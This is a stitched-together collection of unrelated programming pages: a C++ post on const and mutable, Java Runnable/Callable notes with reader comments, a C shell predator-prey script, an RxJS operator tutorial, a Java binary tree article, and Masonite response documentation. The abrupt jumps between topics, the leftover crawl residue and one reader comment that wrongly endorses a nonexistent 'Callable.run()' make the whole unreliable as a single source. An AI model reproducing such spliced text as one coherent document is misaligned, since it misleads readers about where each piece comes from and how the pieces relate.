Responsable classes are classes that are allowed to be returned in your controller methods. These classes simply need to inherit the Responsable class and then contain a get_response method.
Let's take a look at a simple hello world example:
from masonite.response import Responsable

class HelloWorld(Responsable):
    def get_response(self):
        return 'hello world'
This class can now be returned in a controller method:

from some.place import HelloWorld

def show(self):
    return HelloWorld()
Masonite will check if the response is an instance of Responsable and run the get_response method. This will show "hello world" in the browser. This is actually how Masonite's view and mail classes work, so you can see how powerful this can be.
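The dispatch behind this is simple enough to sketch without the framework (an illustration of the pattern only, not Masonite's exact code):

```python
class Responsable:
    """Framework-free stand-in for masonite.response.Responsable."""
    def get_response(self):
        raise NotImplementedError

class HelloWorld(Responsable):
    def get_response(self):
        return 'hello world'

def convert(result):
    # Mirrors the check a framework performs on controller return values:
    # anything Responsable is asked for its response, everything else
    # passes through unchanged.
    if isinstance(result, Responsable):
        return result.get_response()
    return result

output = convert(HelloWorld())   # 'hello world'
```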
You can also return mailables. This is great if you want to debug what your emails will look like before you send them. You can do so by simply returning the mailable method of the mail class:
from app.mailables import WelcomeEmail

def show(self, mail: Mail):
    return mail.mailable(WelcomeEmail())
This will now show what the email will look like.
Sometimes you will want to return an image or a file, like a PDF. You can do this with Masonite pretty easily by using the Download class. Simply pass it the path to a file and Masonite will take care of the rest, like setting the correct headers and getting the file content:

from masonite.response import Download

def show(self):
    return Download('path/to/file.png')
This will display the image or file in the browser. You can also force a download in 1 of 2 ways:
from masonite.response import Download

def show(self):
    return Download('path/to/file.png').force()
    # or, equivalently:
    return Download('path/to/file.png', force=True)
Lastly you can change the name of the image when it downloads:
from masonite.response import Download

def show(self):
    return Download('path/to/file.png').force()
    return Download('path/to/file.png', name="new-file-name.jpg", force=True)
Writing the Console Tab Code
The Console tab that you create in this tutorial allows end users to retrieve information about Windows Home Server objects and then display that information in the Console tab pane area. The Console tab also allows end users to show an associated Settings tab.
To provide this functionality, you need to write code that responds to actions that end users take on your Console tab.
Write the Console Tab application code
With Visual Studio open to the SDKSample project that you created in Setting Up an Add-In Solution, right-click HomeServerTabExtender.cs (HomeServerTabExtender.vb in Visual Basic) in Solution Explorer, and then click View code from the popup menu.
Before you begin adding code for your Console tab, add the appropriate using statements (Imports in Visual Basic) to your code file:
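The statement list itself is missing from this copy of the page; a plausible reconstruction based on the types used later in the tutorial (the exact list in the original may differ):

```csharp
using System;
using System.Drawing;
using System.Windows.Forms;
using Microsoft.HomeServer.Extensibility;
using Microsoft.HomeServer.SDK.Interop.v1;
```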
Step 1: Declare a class that implements the IConsoleTab interface
To create a Console tab, you must create a class that implements the Microsoft.HomeServer.Extensibility.IConsoleTab interface. The IConsoleTab interface contains methods and properties that all Console tabs should contain. Later in this topic, you implement the methods and properties of the interface.
Declare a class that implements the IConsoleTab interface. Delete the existing class declaration for Class1, and replace it with the following:
Step 2: Code the class fields and the HomeServerTabExtender constructor
HomeServerConsole.exe is the program that runs the Windows Home Server Console. When HomeServerConsole.exe finds the HomeServerTabExtender class inside your .dll, it calls the HomeServerTabExtender class constructor to initialize your tab. HomeServerConsole.exe passes in values for the width, height, and Console Services objects for your Console tab as parameters to the constructor call.
In this step, you create three private fields in the HomeServerTabExtender class. The first private field holds the reference to the IConsoleServices object that is passed in with the constructor call. The second private field references the instance of the user control, ShowWHSInfoPanel, that appears in the Console tab pane area. Because the Console tab needs to access information about Windows Home Server objects on the server, you create a third private field for an instance of WHSInfoClass. This is a Microsoft.HomeServer.SDK.Interop.v1 type that provides methods to get information about several Windows Home Server objects.
After creating the private fields, you code the HomeServerTabExtender constructor, which must have the following signature:
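The signature snippet is missing from this copy of the page; it can be recovered from the full constructor shown in the next code block:

```csharp
public HomeServerTabExtender(int width, int height, IConsoleServices consoleServices)
```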
In the constructor, initialize each of the private fields, and hook up event handlers (that you code in the next step) for the button click events for all three buttons on the instance of the ShowWHSInfoPanel user control.
// The class declaration
public class HomeServerTabExtender : Microsoft.HomeServer.Extensibility.IConsoleTab
{
    // Private fields declared
    private IConsoleServices services;

    // Declare an instance of the UserControl, ShowWHSInfoPanel
    private ShowWHSInfoPanel nPanel;
    private WHSInfoClass whsInfo;

    // The constructor
    public HomeServerTabExtender(int width, int height, IConsoleServices consoleServices)
    {
        // Initialize the private fields
        nPanel = new ShowWHSInfoPanel();
        nPanel.Size = new Size(width, height);
        this.services = consoleServices;
        whsInfo = new WHSInfoClass();

        // Hook up event handlers for the nPanel buttons
        nPanel.btnClearInfo.Click += new EventHandler(BtnClearInfo_Click);
        nPanel.btnShowInfo.Click += new EventHandler(BtnShowInfo_Click);
        nPanel.btnOpenSettings.Click += new EventHandler(BtnOpenSettings_Click);
    }
}
Step 3: Code event handlers
In the section of code above, you hooked up event handlers with the click event for each of the three buttons on the ShowWHSInfoPanel instance, nPanel. In this step, you write the three event-handler methods.
Code the BtnShowInfo Click method
First, code the event handler for the nPanel.btnShowInfo.Click event. When an end user clicks Show WHS Info on the Console tab pane area, the BtnShowInfo_Click method sets the Text property for the RichTextBox Control, nPanel.rtShowWHSInfo, to a string that contains information about some Windows Home Server objects that are on the server.
The BtnShowInfo_Click method creates three Array objects, and then populates each Array with objects of a given Windows Home Server type. Then, the method loops through each Array, collecting information about each item in the Array. Finally, the Text property for the nPanel.rtShowWHSInfo RichTextBox Control is set to the string that contains all of the collected information:
internal void BtnShowInfo_Click(object sender, EventArgs e)
{
    string displayText;

    // Fill each array with WHS objects
    Array disks = whsInfo.GetDiskInfo();
    Array volumes = whsInfo.GetVolumeInfo();
    Array shares = whsInfo.GetShareInfo();

    displayText = "DISK INFORMATION:\nSystem Name\t\tSize\n";

    // Iterate through each array and get individual WHS object information
    foreach (IDiskInfo pDisk in disks)
    {
        displayText += pDisk.DevicePath.ToString() + "\t\t" + pDisk.Size.ToString() + "\n\n";
    }

    displayText += "VOLUME INFORMATION:\nPath\t\tSize\n";

    foreach (IVolumeInfo pVolume in volumes)
    {
        displayText += pVolume.Path.ToString() + "\t\t" + pVolume.Size.ToString() + "\n\n";
    }

    displayText += "SHARE INFORMATION:\nName\t\tIs Duplicated\n";

    foreach (IShareInfo pShare in shares)
    {
        displayText += pShare.Name.ToString() + "\t\t" + pShare.IsDuplicated.ToString() + "\n\n";
    }

    // Display the collected information
    nPanel.rtShowWHSInfo.Text = displayText;
}
Code the BtnClearInfo Click method
Next, code the event handler for the nPanel.btnClearInfo.Click event. The BtnClearInfo_Click method is fairly simple. It uses one line of code to clear any text from the display area of the nPanel user control.
When an end user clicks Clear Display on the nPanel user control, the BtnClearInfo_Click method sets the Text property of the nPanel.rtShowWHSInfo RichTextBox control to an empty string:
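The method body is missing from this copy of the page; a reconstruction matching the description above:

```csharp
internal void BtnClearInfo_Click(object sender, EventArgs e)
{
    // Clear any text from the display area
    nPanel.rtShowWHSInfo.Text = "";
}
```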
Code the BtnOpenSettings Click method
Finally, code the event handler for the nPanel.btnOpenSettings.Click event. When an end user clicks Open Settings on the nPanel user control, the Windows Home Server Settings dialog opens to the Settings tab that you specify in the BtnOpenSettings_Click method.
The BtnOpenSettings_Click method calls the Microsoft.HomeServer.Extensibility.IConsoleServices.OpenSettings(System.Guid) method, passing the globally unique identifier (GUID) for a specific Settings tab as the only argument:
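The snippet is missing from this copy of the page; a reconstruction consistent with the text (the GUID value below is a placeholder — substitute the GUID of the Settings tab you want the dialog to open to):

```csharp
internal void BtnOpenSettings_Click(object sender, EventArgs e)
{
    // Placeholder GUID -- pass the GUID of your Settings tab
    services.OpenSettings(new Guid("00000000-0000-0000-0000-000000000000"));
}
```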
Step 4: Implement the TabText property
The TabText property is read-only and returns a string that contains the caption or text for the Console tab. This is the caption that describes your Console tab. For example, the TabText property for the Console tab that deals with user accounts is User Accounts.
Code the TabText property so that it returns "SDK Sample" as in the following code snippet:
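The snippet is missing from this copy of the page; the property described is straightforward to reconstruct:

```csharp
public string TabText
{
    get { return "SDK Sample"; }
}
```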
Step 5: Implement the TabImage property
The TabImage property of the IConsoleTab interface returns a bitmap. This bitmap appears on the Console tab above the TabText.
Use the image file SDKSampleImg that you added as a resource to the SDKSample project in the topic Setting Up an Add-In Solution:
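The snippet is missing from this copy of the page; a reconstruction under the assumption that the image was added as a project resource (the resource accessor name is assumed):

```csharp
public Bitmap TabImage
{
    get { return Properties.Resources.SDKSampleImg; }
}
```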
Step 6: Implement the TabControl property
The TabControl property returns the Control that appears in the pane area of the console when you select the tab, as mentioned in Step 1 of this topic. For the purposes of this tutorial, return the nPanel UserControl that you instantiated in the HomeServerTabExtender class constructor.
Code the TabControl property so that it returns the Control, nPanel:
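The snippet is missing from this copy of the page; reconstructed from the description above:

```csharp
public Control TabControl
{
    get { return nPanel; }
}
```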
Step 7: Implement the GetHelp() method
Use GetHelp to display Help content when an end user selects your tab and presses one of the Help keys (Help on the Windows Home Server Console or F1). You must implement the GetHelp method as part of the IConsoleTab interface, and if you are an OEM or System Builder you must hook up your own Help content to your Console tab.
The signature of the GetHelp method requires you to return a Boolean value that indicates that you will display custom Help content for your Console tab. A return value of true indicates that you will display your custom Help content.
For this tutorial, you can just display a MsgBox for your Help, but when you create an actual production tab, you may want to display a Help topic in a compiled Help file (.chm):
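The snippet is missing from this copy of the page; a reconstruction matching the MsgBox suggestion (the message text is illustrative):

```csharp
public bool GetHelp()
{
    // In production, show a topic from a compiled Help file (.chm) instead.
    MessageBox.Show("Help for the SDK Sample tab.");
    return true;
}
```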
Step 8: Implement the SettingsGuid property
Depending upon how your add-in works, you may want to provide end users the ability to set options for your application. To do so, create a custom Settings tab on the Settings page dialog for the Windows Home Server Console. The custom Settings tab must be an implementation of the ISettingsTab interface.
For example, a user who wants to change settings for shared folders clicks the Settings button on the console. When the Settings page dialog appears, the user clicks Shared Folders in the tab area of the Settings page dialog, and then changes the settings.
You can also associate a Settings tab with a Console tab. You create the association by using the SettingsGuid property.
For the SettingsGuid property, you have two choices:
- Return a GUID for a specific Settings tab. To do this, you must return a System.Guid object with the GUID of the Settings tab that you want to associate with your Console tab.
- Return an empty Guid. Returning an empty System.Guid indicates that you do not want to associate a Settings tab with your Console tab.
For this tutorial, do not use this property to create an association between the Console tab and a Settings tab because this tutorial implements a button on the Console tab pane area that opens the Settings page dialog directly.
Code the SettingsGuid so that it does not create an association with a Settings tab:
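The snippet is missing from this copy of the page; returning an empty Guid, as the text describes:

```csharp
public Guid SettingsGuid
{
    get { return Guid.Empty; }
}
```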
Summary
You have now created a Windows Home Server Console tab. Work through the rest of the tutorial to finish your sample add-in solution.
See Also | https://msdn.microsoft.com/en-us/library/bb626016.aspx | CC-MAIN-2018-17 | refinedweb | 1,525 | 53.21 |
jimmer 0 Posted February 5, 2005

$coord = PixelSearch(566,261,566,261,0x000000) & $coord = PixelSearch(566,281,566,281,0x000000)
if @error then
    MouseClick("Left", 630, 308, 1, 0)
    Sleep(600)
endif
if not @error then
    sleep(1000)
endif

Alright, I would just like the first coord to work together with the second... but this code just doesn't seem to do the job? I would like both coords to work together, but I guess the "&" just won't cut it. It's searching for two different pixels, (566, 261) and (566, 281), not (566, 261, 566, 281), so yeah.... hope you can understand my bad grammar.
MOSS 2007 provides an out-of-the-box (OOTB) document conversion process. It runs as a timer job in the MOSS job timer, and must be executed by the user. Now, the idea is to publish a page to our ResepOke.Com site from an email attachment – so we don't need to go to the web site anymore to create a new page.
The solution
Since the OOTB document conversion only works on a limited number of file types (for example, docx into aspx), we cannot publish to a page directly from the email format. Therefore, we will create the page in docx and attach it to an email to publish it to the site. On the server, we need an event receiver to detect the new incoming document and trigger the document conversion process. However, instead of creating an event receiver we can use a Visual Studio workflow solution.
Step-by-Step
1. Configure the document library to receive documents from email.
2. Create a component/class to extract embedded images and store them in the site's images library.
3. Create a component/class to launch the document conversion process. You need the correct transformer ID:
public class Tranformer
{
    public const string Docx = "{6dfdc5b4-2a28-4a06-b0c6-ad3901e3a807}";
    public const string Docm = "{888d770d-d3e9-4d60-8267-3c05ab059ef5}";
    public const string Infopath = "{853d58f5-13c3-46f8-8b81-3ca4abcad7b3}";
    public const string Xsl = "{2798ee32-2961-4232-97dd-1a76b9aa6c6f}";
}
4. Incorporate all components into a Visual Studio workflow solution and deploy it to the site. The workflow will check for docx documents and execute the image-parsing and document conversion processes.
5. Add the workflow to the site and attach it to the document library. Don't forget to set up the start-up options of the workflow too.
And voila — if you send an email to [email protected], your page will be published automatically.
Using VB.NET 2013 WinForms, create an XML file that matches the sample XML file, using a class created from XSD files with the Microsoft tool [login to view URL] to generate the class for the VB project
Budget $30-250 USD
Do not bid if you are not familiar with [login to view URL], XML files, or XSD files. This project is for creating a VB.NET 2008 or 2013 project that creates an XML file that exactly matches the sample XML file in the attached files. I don't want to just create the XML file from scratch; I want to create a class based on the XSD files and then utilize that class to create the XML file. [login to view URL] is a tool that takes an XSD file and creates a class that can be included in an existing Visual Studio project. When creating the class, please make sure the /l option is utilized and the VB language is selected, and that the /n option is used with the following namespace: Tx_Transactions_V_1_5. It looks to me like the [login to view URL] is the main XSD file that the class needs to be based on. Please don't modify any XSD files or the class created from xsd.exe.
Again, please don't bid on this project if you are not familiar with [login to view URL], XML files, or XSD files.
To gain access to the geometries of all features in a feature class, just do the following:
import arcpy
from arcpy import env
fc = r"c:\temp\data.shp"
geoms = arcpy.CopyFeatures_management(fc, arcpy.Geometry())
for g in geoms:
    print g.extent
This sample allows anyone to directly access the geometries of the input feature class without having to use the Cursor objects.
The same idea can be applied to other functions, such as the analysis functions, as well:
import arcpy
from arcpy import env
fc = r"c:\temp\data.shp"
geom = arcpy.Buffer_analysis(fc, arcpy.Geometry(), "100 Feet", "FULL", "ROUND")[0]
print geom.extent
Here the buffer tool outputs a single geometry to the geom object and the extent is displayed.
Where this becomes really powerful is when you need to perform geometry operations on your data, and want to put the results back into that row.
import arcpy
from arcpy import env
fc = r"c:\temp\data.shp"
with arcpy.da.UpdateCursor(fc, ["SHAPE@"]) as urows:
    for urow in urows:
        geom = arcpy.Buffer_analysis(urow[0], arcpy.Geometry(), "100 Feet", "FULL", "ROUND")[0]
        row[0] = geom
        urows.updateRow(urow)
    del urow
del geom
Assuming that the input is a polygon, this snippet shows how geometries can be used as inputs and outputs thus allowing for easy insertion back into the original row.
Hope this helps!
2 comments:
Thanks for the "hot" tips for GIS objects.
in your last example, you also could have used the built in buffer method for geometry objects:
urow[0] = urow[0].buffer(100)
mind you the 100 is in whatever units your data is in.
also, line 7 should say urow[0] instead of row[0]
Great post, not enough people using the geometry objects. | http://anothergisblog.blogspot.com/2013/11/geometry-objects-make-life-easier.html | CC-MAIN-2017-22 | refinedweb | 289 | 58.08 |
Code, Ctrl-P) and if the IDE can figure out the method signature of the method call surrounding the caret, it will display the parameter list, and show the current parameter in bold. As you move the caret around, the tooltip will be updated to show which parameter you're currently editing.
Messing with the user's editing workflow is always risky, so please let me know how the new code completion behavior works for you. The parameter tooltip depends on being able to figure out the signature of the surrounding method call, which depends on type inference, so it may not always work - but it will also improve as I tweak and improve type analysis across code completion, goto declaration, etc.
There is also a Go To Test action now for jumping quickly between a class and its unit test. Should work in Rails, RSpec, ZenTest, and also between any classes named Foo, FooTest or TestFoo regardless of which files they're in. This action is in the editor context menu, and is bound to Ctrl-Shift-E. To get this stuff, get at least version 0.65 of the Ruby Feature module (see these installation instructions).
P.S. You can find some more information on the Ruby support in an interview I did with Geertjan Wielenga a couple of weeks ago. There are some other interviews in the same series talking about the new language support in NetBeans. The Rails support in NetBeans will soon have improved support for JavaScript, YAML, and RHTML - stay tuned!
(2007-04-10 23:59:52.0)
Posted by Romain Guy on April 11, 2007 at 12:11 AM PDT #
Yes, the Java editor also has this functionality!
Posted by Tor Norbye on April 11, 2007 at 12:27 AM PDT #
Posted by Romain Guy on April 11, 2007 at 01:53 AM PDT #
Posted by Scott Walter on April 11, 2007 at 06:14 AM PDT #
Posted by Casper on April 11, 2007 at 07:30 AM PDT #
Posted by Ralph on April 11, 2007 at 01:57 PM PDT #
Posted by Ralph on April 11, 2007 at 01:59 PM PDT #
Posted by Ralph on April 11, 2007 at 02:31 PM PDT #
the Mac keybindings recently got broken; up until Milestone 7 this worked. I've been involed in some e-mails on the subject; I'll make sure there's a high priority bug filed on this.
Yes, you need to use Ctrl-Space to invoke code completion. I used to have it auto-activated on "." but got some complaints that it was getting in the way. (It -does- auto activate on ::, e.g. Test::Unit:: will show TestCase and friends).
Hi Scott, we do have an alias named dev@scripting.netbeans.org dedicated to this but there isn't a lot of traffic yet; it's mostly being done through the issue tracker - and a lot of the feedback is coming in through the blog right now :)
Posted by Tor Norbye on April 11, 2007 at 02:38 PM PDT #
Posted by Tor Norbye on April 11, 2007 at 02:51 PM PDT #
Posted by Ralph on April 12, 2007 at 08:15 AM PDT #
Big problem with Ruby, when you define a class, you don't specify the types of its arguments. I concede that is SO powerful but, in many cases, we would probably be better served by giving the IDE a hint of the class we are passing, using some kind of annotations.
The Sapphire Steel guys, which are doing what I believe is a very nice work to get good Intellisense, let you use optional comments in a special format before the declaration and have the ide parse them to infer the types of arguments and return value.
They refer this as "Type assertions" and this is a sample:
Example:
#:return:=>Array
#:arg:names=>Array
#:arg:aName=>String
def addName( names, aName )
return names << aName
end
So, when you later type addName(, the autocomplete shows this tooltip:
addName( names:Array, aName:String):Array
I don't want to start a religion war on typed vs. typeless languages. Truth is I may be wrong but, coming from a Java background, I miss so much a good autocomplete capability in the IDE.
The keyword here is OPTIONAL; since you don't have to do it if you don't like it, it would be only for the rest of us who would really appreciate this feature.
However, if in the end you decide to implement this feature, I think it would be nice to follow the syntax of Sapphire, so the code can be more easily transferred and we avoid creating Ruby dialects. Or, a "Save as Sapphire Comments" or similar can be also a good option.
Anyway, thanks for your great work.
Jose Femenias, (big fan of Java Posse)
P.S.: Sample was taken from this page
Posted by Jose Femenias on April 12, 2007 at 11:12 AM PDT #
Hi Jose, as of the latest version type assertions are supported. I have looked into this before (and it's part of my JavaOne talk on Ruby tooling), and type assertions are definitely controversial - especially if it's used by code completion to tell you the expected type of methods (since that seems to restrict Ruby's duck typing). On the other hand, it can help your productivity in your own methods if you annotate them with these in that code completion can be more direct. So that's the part I have implemented - type assertions will help the type inference engine when you're using code completion inside that method. They are not propagated to clients elsewhere (yet - something to discuss).
To get these features you need the very latest builds - deadlock build #913 or later (but the Ruby build is not running now; it's waiting for the upstream trunk build to build successfully - so give it a little while.)
Posted by Tor Norbye on April 13, 2007 at 11:56 AM PDT #
Posted by Steven Herod on April 14, 2007 at 04:45 AM PDT #
Ruby1-985 complained today about not meeting the requirements for language support. Looks like it's relying on the next nightly build of Netbeans IDE (ver. 17-04-06 was mentioned in the error).
So, instead of building Netbeans myself, I'm trying out the RubyIDE build. Are there any outstanding issues related to running on Mac? You mentioned there were some problems a while back wiuth keybindings, packaging etc.
Posted by Si on April 17, 2007 at 01:08 AM PDT #
Don't worry about previous question. Since I'm in a different timezone (Italy), I've plenty of time to find out how the IDE build fares. The Wiki info is up to date on current IDE build issues I think.
Do you want rhtml bug reports yet, or would it be better to wait?
Posted by Si on April 17, 2007 at 02:40 AM PDT #
thanks a lot for the support for type assertions and the very quick answer. I understand the subject could be controversial because it seems restricting; that's why I insisted on the optional nature of the implementation. Hopefully, this will satisfy most of us...(But, you know, "You can SATISFY some of the people all of the time, and all of the people some of the time, but you can not SATISFY all of the people all of the time"; hope Mr. Lincoln forgives me for the paraphrasing ) I'm willing to test the feature ASAP.
Thanks AGAIN!
Posted by Jose Femenias on April 17, 2007 at 09:35 AM PDT #
Posted by Ralph on April 17, 2007 at 10:48 AM PDT #
Hi Si, it's still a bit early for RHTML bug reports - a bunch of new stuff landed yesterday (code completion in the HTML part, a navigator) but unfortunately it's affected regular Ruby editing a bit. We'll get this ironed out in the next couple of days. Again, Milestone 9 should be a good build to use and report bugs on.
Jose, yep - we can't satisfy everybody :) But hopefully this is a good start.
Posted by Tor Norbye on April 17, 2007 at 05:49 PM PDT #
Is there a work-in-progress cheatsheet floating around for functions and features currently being developed/WIP? I'd sure like to see things like how to actually USE the abbreviations that you've just added, as well as standard other functions that we're not familiar with. NB is very new for most Rubyists and we need a little hand-holding to get started, especially for whiz-bang features that really will sell us on it.
Posted by Ralph on April 18, 2007 at 08:13 PM PDT #
Also, when typing, for example: "assert_redirected_to :action => 'index'" it does not start autocompleting "asser"... as it seems that it should just by virtue of inspecting Rails. Seems that the autocomplete is not fully baked yet or am I missing something?
Posted by Ralph on April 18, 2007 at 08:18 PM PDT #
Posted by Ralph on April 18, 2007 at 08:21 PM PDT #
Posted by Sergey Kuznetsov on April 19, 2007 at 08:47 AM PDT #
Posted by ylon on April 19, 2007 at 04:16 PM PDT #
Regarding CSS auto completion - the CSS and JavaScript support is being revamped right now - as is RHTML and embedding of these other languages, but I'm not sure exactly how far along it is yet.
Sergey, yep - I got your e-mail - it got buried in my inbox (33,286 messages right now and counting) but I just fired off a reply (and filed an enhancement request on your behalf in Issuezilla.)
Ylon - yes, I have a dark theme I'm using - inspired by the BlueTheme for TextMate. It works okay for Ruby - but I haven't at all tweaked it for other files, such as RHTML. If you want to try it, e-mail me - and maybe we can work together to polish it such that we can spread it more widely.
Posted by Tor Norbye's Weblog on April 25, 2007 at 11:46 AM PDT #
By the way, here's what it looks like: [screenshot omitted]
Note however that the rest of the IDE - including code completion popups and such - uses the look and feel of the application, which at least in my case stays white and Mac-like. The one area which is problematic is editor highlights like breakpoints, which don't seem to be configurable by theme - and the breakpoint colors don't work well with a dark theme. I'm going to ping somebody to see what can be done about this.
Posted by Tor Norbye's Weblog on April 25, 2007 at 11:55 AM PDT # | http://blogs.sun.com/tor/entry/ruby_screenshot_of_the_week8 | crawl-001 | refinedweb | 1,819 | 64.24 |
Hello everyone, I am Naz Islam and I am a Java developer.
Looking forward to learning new tricks in Java and helping others.
Thank you.
Hello, could you help with this? The drawing doesn't upload.
// code begins here
import javax.swing.*;
import java.awt.*;

public class ColorPanel extends JPanel {
    public ColorPanel(Color backColor) {
        setBackground(backColor);
    }

    public void paintComponent(Graphics g) {
        super.paintComponent(g);
        g.setColor(Color.blue);
        g.drawString("hello", 100, 45);
    }
}
I think your code is almost right. However, I think you need JFrame in order to have graphics on the screen. Notice ColorPanel uses Graphics in order to draw string on the screen. In Main class, I have created an instance of JFrame and ColorPanel. Since the constructor of ColorPanel takes a color argument, I passed Color.BLACK. Finally, I've added that to the frame. Hope this helps. Let me know your comments
Main.java
ColorPanel.java
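Since the original attachments aren't visible in the thread, here is a hedged sketch of what the two files described above could look like together. The frame title and size are assumptions, and ColorPanel is repeated from the post above so the example compiles on its own:

```java
import javax.swing.JFrame;
import javax.swing.JPanel;
import java.awt.Color;
import java.awt.Graphics;

// Repeated from the post above so this sketch is self-contained.
class ColorPanel extends JPanel {
    public ColorPanel(Color backColor) {
        setBackground(backColor);
    }

    @Override
    public void paintComponent(Graphics g) {
        super.paintComponent(g);
        g.setColor(Color.blue);
        g.drawString("hello", 100, 45);
    }
}

public class Main {
    public static void main(String[] args) {
        // Top-level window that hosts the panel (title and size are assumptions).
        JFrame frame = new JFrame("ColorPanel demo");
        frame.setSize(300, 200);
        frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);

        // The ColorPanel constructor requires a color, so pass Color.BLACK.
        frame.add(new ColorPanel(Color.BLACK));
        frame.setVisible(true);
    }
}
```

Without the JFrame, the panel is never attached to a visible window, which is why nothing was drawn.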
Last edited by nazislam; January 22nd, 2019 at 02:04 AM. Reason: Updated formatting.
I am a Java developer and I blog about Java programming, web development and algorithm design.
You may follow me on twitter @nazalislam.
If you don't understand my answer, don't ignore it, ask a question. | https://www.javaprogrammingforums.com/member-introductions/41649-hello.html | CC-MAIN-2019-47 | refinedweb | 220 | 52.36 |
App lifecycle
This topic describes the lifecycle of a Windows Runtime app, from the time it is deployed through its removal. By launching, suspending, and resuming your app appropriately, you ensure that your customer has the best possible experience with your app.
App execution state
This illustration represents the transitions between app execution states. We describe these states and events in the next several sections. For more info about each state transition and what your app should do in response, see the reference for the ApplicationExecutionState enumeration.
Deployment
In order for an app to be activated in any way, it must first be deployed. Basic deployment is taken care of either when a user installs your app or when you use Visual Studio to build and run your app locally during development and testing. For more info on this and on advanced deployment scenarios, see App packages and deployment.
App launch
An app is launched whenever it is activated by the user and the app process was previously in the NotRunning state. An app could be in the NotRunning state because it has never been launched, because it was running but then crashed, or because it was suspended but then couldn't be kept in memory and was terminated by the system.
When an app is launched, Windows displays a splash screen for the app. To configure this splash screen, see "Adding a splash screen" (HTML or XAML).
While the splash screen is displayed, your app code should ensure that the app is ready for its user interface to be displayed to the user. The primary tasks for the app are to register event handlers and set up any custom UI it needs for loading the initial page. See "How to extend the splash screen" (HTML or XAML) and the Splash screen sample for more info. After the app completes activation, it enters the Running state and the splash screen disappears (and all its resources and objects are cleared). Showing a window, returning from the activation handler, and completing a deferral are specific ways that an app completes activation. For more info, see "How to activate an app" (HTML or XAML).
App activation
An app can be activated by the user through a variety of contracts and extensions. To participate in activation, your app must register to receive the WinJS activated event (HTML) or override the OnActivated method (XAML). (For HTML, WebUIApplication.activated is another event you can handle for activation.)
Your app's activation code can test to see why it was activated and whether it was already in the Running state. Apps can be activated using any of these activation types:
Apps that are built for Windows 8.1 and later can be activated by any of the above, or can be activated with these activation types.
Windows Phone apps can be activated with these types.
Your app can use activation to restore previously saved data in the event that the operating system terminates your app, and subsequently the user re-launches it. Windows may terminate your app after it has been suspended for a number of reasons. The user may manually close your app, or sign out, or the system may be running low on resources. If the user launches your app after Windows has terminated it, the app receives an activated event (HTML) or Application.OnActivated callback (XAML) and the user sees the splash screen of your app until the app is activated. You can use this event to determine whether your app needs to restore the data which it had saved when it was last suspended, or whether you must load your app’s default data. Because the splash screen is up, your app code can invest some processing time to get this done without there being any apparent delay to the user, but previously-mentioned concerns about long-running operations also apply if you're restarting or continuing. The activated/OnActivated event data includes a PreviousExecutionState property that tells you which state your app was in before it was activated. This property is one of the values from the ApplicationExecutionState enumeration:
PreviousExecutionState could also have a value of Running or Suspended, but in these cases your app was not previously terminated and therefore you don’t have to worry about restoring data.
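The decision described above can be sketched in plain JavaScript. The state strings mirror the ApplicationExecutionState values; this is an illustration of the logic, not the WinJS API itself:

```javascript
// Decide whether to restore saved session data, based on the previous
// execution state reported in the activation event data. The state
// names mirror the ApplicationExecutionState enumeration values.
function shouldRestoreState(previousExecutionState) {
  // terminated: the app was suspended and then terminated by the system,
  // so the data saved at suspend time should be restored.
  if (previousExecutionState === "terminated") {
    return true;
  }
  // notRunning / closedByUser: load the app's default data instead.
  // running / suspended: the app was never terminated, so its in-memory
  // data is intact and nothing needs restoring.
  return false;
}
```

A real app would call logic like this inside its activated handler, while the splash screen is still up.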
Note
If you log on using the computer's Administrator account, you can't activate any Windows Runtime app.
For more info, see App extensions.
OnActivated versus specific activations in a XAML app
For the XAML activation model and Application class, the OnActivated method is the means to handle all possible activation types. However, it's more common to use different methods to handle the most common activation types, and use OnActivated only as the fallback method for the less common activation types. For example, Application has an OnLaunched method that's invoked as a callback whenever ActivationKind is Launch, and this is the typical activation for most apps. There are 6 more On* methods for specific activations: OnCachedFileUpdaterActivated, OnFileActivated, OnFileOpenPickerActivated, OnFileSavePickerActivated, OnSearchActivated, OnShareTargetActivated. Starting templates for a XAML app have an implementation for OnLaunched and a handler for Suspending, with both of these incorporating methods from the SuspensionManager class that comes predefined in each template. Describing what SuspensionManager does is outside the scope of this topic; for more info see C#, VB, and C++ project templates for apps.
App suspend
An app can be suspended when the user switches away from it or when the device enters a low power state. Most apps are suspended when the user switches away from them.
When the user moves an app to the background, Windows waits a few seconds to see whether the user immediately switches back to the app. If the user does not switch back within this time window, Windows suspends the app.
If an app has registered an event handler for the WinJS checkpoint event (for HTML) or the Application.Suspending event (for XAML), this code is called immediately before the app is suspended. You can use the event handler to save relevant app and user data. We recommend that you use the application data APIs for this purpose because they are guaranteed to complete before the app enters the Suspended state. For more info, see Accessing app data with the Windows Runtime. You should also release exclusive resources and file handles so that other apps can access them while your app isn't using them.
Generally, your app should save its state and release its exclusive resources and file handles immediately when handling the suspending event, and the code should not take more than a second to complete. If an app does not return from the suspending event within 5 seconds on Windows and between 1 and 10 seconds on Windows Phone, Windows assumes that the app has stopped responding and terminates it.
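As a sketch of the save-on-suspend pattern, with a generic key-value store standing in for the application data APIs (the store and the session-state shape are assumptions for illustration):

```javascript
// Build a suspend handler that snapshots just enough session state to
// relaunch later. The handler must finish quickly: roughly 5 seconds on
// Windows before the system assumes the app has stopped responding.
function makeSuspendHandler(store, getSessionState) {
  return function onSuspending() {
    const state = getSessionState();
    store.set("sessionState", JSON.stringify(state));
    // A real app would also release exclusive resources and file
    // handles here so other apps can use them during suspension.
  };
}

// Usage with an in-memory Map standing in for app data storage.
const store = new Map();
const onSuspending = makeSuspendHandler(store, () => ({ page: "home", scroll: 120 }));
onSuspending();
```

Keeping the saved state small is what makes it feasible to stay within the suspend deadline.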
Windows attempts to keep as many suspended apps in memory as possible. Keeping these apps in memory ensures that users can quickly and reliably switch between suspended apps. However, if there aren't enough resources to keep your app in memory, Windows can terminate your app. A suspended app that is resumed from memory functions as it did before it was suspended.
There are some app scenarios where the app must continue to run to complete background tasks. For example, your app can continue to play audio in the background; for more info, see "How to play audio in the background" (HTML or XAML). Also, background transfer operations continue even if your app is suspended or even terminated; for more info, see "How to download a file" (HTML or XAML).
For guidelines, see Guidelines for app suspend and resume.
For example code, see "How to suspend an app" (HTML or XAML).
App visibility
When the user switches from your app to another app, your app is no longer visible but remains in the Running state until Windows can suspend it. If the user switches away from your app but activates or switches back to it before it can suspended, the app remains in the Running state.
Your app doesn't receive an activation event when app visibility changes, because the app is still running. Windows simply switches to and from the app as necessary. If your app needs to do something when the user switches away and back, it can handle the visibilitychange event (for HTML) or Window.VisibilityChanged event (for XAML).
The visibility event is not serialized with the suspend and resume events.
App resume
